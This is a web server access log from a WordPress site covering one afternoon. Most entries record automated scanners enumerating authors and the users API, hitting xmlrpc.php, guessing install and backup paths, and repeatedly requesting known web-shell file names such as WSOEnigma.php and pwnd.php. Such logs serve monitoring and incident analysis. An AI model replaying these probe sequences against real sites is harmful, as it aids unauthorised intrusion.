172.200.254.137 - - [01/Apr/2025:13:01:17 -0400] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:21 -0400] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:22 -0400] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:22 -0400] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:23 -0400] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:24 -0400] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:26 -0400] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.200.254.137 - - [01/Apr/2025:13:01:27 -0400] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.108.106.250 - - [01/Apr/2025:13:28:33 -0400] "GET /cbd-uk-what-is-it/ HTTP/1.1" 200 17108 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:28:40 -0400] "POST /wp-cron.php?doing_wp_cron=1743528519.8600819110870361328125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
185.108.106.250 - - [01/Apr/2025:13:28:34 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://the80itspod.com/cbd-uk-what-is-it/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:38:52 -0400] "GET /wp-cli.php HTTP/1.1" 403 7163 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:20 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:44:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743529466.9838249683380126953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
208.85.92.157 - - [01/Apr/2025:13:44:20 -0400] "GET /?author=1 HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:29 -0400] "GET /?author=2 HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:44:33 -0400] "POST /wp-cron.php?doing_wp_cron=1743529472.6859629154205322265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
208.85.92.157 - - [01/Apr/2025:13:44:32 -0400] "GET /?author=3 HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:34 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 401 108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:36 -0400] "GET /wp-json/oembed/1.0/embed?url=http://the80itspod.com HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:38 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:13:44:39 -0400] "POST /xmlrpc.php HTTP/1.1" 503 7940 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:28 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:32 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:33 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 403 7161 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:36 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:37 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:39 -0400] "GET /wp-login.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:41 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:42 -0400] "GET /xmlrpc.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:43 -0400] "GET /wp-admin.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:45 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:46 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:47 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:49 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:51 -0400] "GET /WSOEnigma.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:59:53 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:00:08 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:14:00:13 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
40.88.21.235 - - [01/Apr/2025:14:11:42 -0400] "GET / HTTP/1.1" 200 16759 "http://the80itspod.com/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
40.88.21.235 - - [01/Apr/2025:14:11:44 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://the80itspod.com/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
198.54.114.83 - - [01/Apr/2025:14:41:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743532899.0269460678100585937500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
13.229.78.155 - - [01/Apr/2025:14:41:35 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 521 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:40 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 409 1222 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:41 -0400] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:41 -0400] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:44 -0400] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 403 7163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:45 -0400] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:46 -0400] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:47 -0400] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:48 -0400] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:49 -0400] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:50 -0400] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 403 7163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:50 -0400] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:53 -0400] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 403 7163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:54 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:55 -0400] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 403 7164 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:56 -0400] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:57 -0400] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 403 7163 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:57 -0400] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:58 -0400] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:41:59 -0400] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 9428 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:42:00 -0400] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:42:01 -0400] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 9421 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:42:03 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 7162 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:14:42:04 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
85.208.98.23 - - [01/Apr/2025:14:55:47 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
146.190.77.47 - - [01/Apr/2025:15:07:01 -0400] "GET / HTTP/1.1" 200 16759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:07:07 -0400] "POST /wp-cron.php?doing_wp_cron=1743534426.9274809360504150390625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://the80itspod.com"
146.190.77.47 - - [01/Apr/2025:15:07:01 -0400] "GET /?author=1 HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.77.47 - - [01/Apr/2025:15:07:07 -0400] "GET /?author=2 HTTP/1.1" 404 9424 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.77.47 - - [01/Apr/2025:15:07:11 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 401 108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.77.47 - - [01/Apr/2025:15:07:12 -0400] "GET /wp-json/oembed/1.0/embed?url=http://the80itspod.com HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.77.47 - - [01/Apr/2025:15:07:13 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.77.47 - - [01/Apr/2025:15:07:14 -0400] "POST /xmlrpc.php HTTP/1.1" 503 7940 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:34:36 -0400] "GET /wp-cli.php HTTP/1.1" 403 7162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.82.11.58 - - [01/Apr/2025:15:36:38 -0400] "GET /wp-content/themes/covernews/assets/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 18928 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.9.8 - - [01/Apr/2025:15:36:52 -0400] "GET /wp-content/themes/covernews/assets/script.js HTTP/1.1" 200 3529 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.9.29 - - [01/Apr/2025:15:41:15 -0400] "GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1" 200 35438 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.230 - - [01/Apr/2025:15:42:40 -0400] "GET /wp-content/themes/covernews/js/navigation.js HTTP/1.1" 200 1179 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.9.6 - - [01/Apr/2025:15:42:52 -0400] "GET /wp-content/themes/covernews/assets/fixed-header-script.js HTTP/1.1" 200 868 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
185.220.101.28 - - [01/Apr/2025:15:46:28 -0400] "GET / HTTP/1.1" 200 16759 "the80itspod.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 u01-04"
47.82.10.1 - - [01/Apr/2025:15:46:28 -0400] "GET /wp-content/themes/covernews/assets/slick/js/slick.min.js HTTP/1.1" 200 14359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.82.10.165 - - [01/Apr/2025:15:51:18 -0400] "GET /wp-content/themes/covernews/js/skip-link-focus-fix.js HTTP/1.1" 200 426 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.79.98.89 - - [01/Apr/2025:15:53:18 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1" 200 5342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.79.98.205 - - [01/Apr/2025:15:55:11 -0400] "GET /wp-content/themes/covernews/assets/marquee/jquery.marquee.js HTTP/1.1" 200 5475 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
47.79.3.180 - - [01/Apr/2025:15:56:21 -0400] "GET /wp-content/themes/covernews/assets/jquery-match-height/jquery.matchHeight.min.js HTTP/1.1" 200 1470 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
13.229.78.155 - - [01/Apr/2025:15:56:48 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:56:54 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:56:55 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 403 7163 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:56:56 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:56:57 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 403 7161 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:56:59 -0400] "GET /wp-login.php HTTP/1.1" 403 7161 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:00 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:02 -0400] "GET /xmlrpc.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:03 -0400] "GET /wp-admin.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:03 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:04 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:05 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:06 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 403 7161 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:07 -0400] "GET /WSOEnigma.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:07 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:08 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 403 7162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:57:09 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 403 7161 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
40.88.21.235 - - [01/Apr/2025:16:46:05 -0400] "GET / HTTP/1.1" 200 16759 "http://the80itspod.com/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
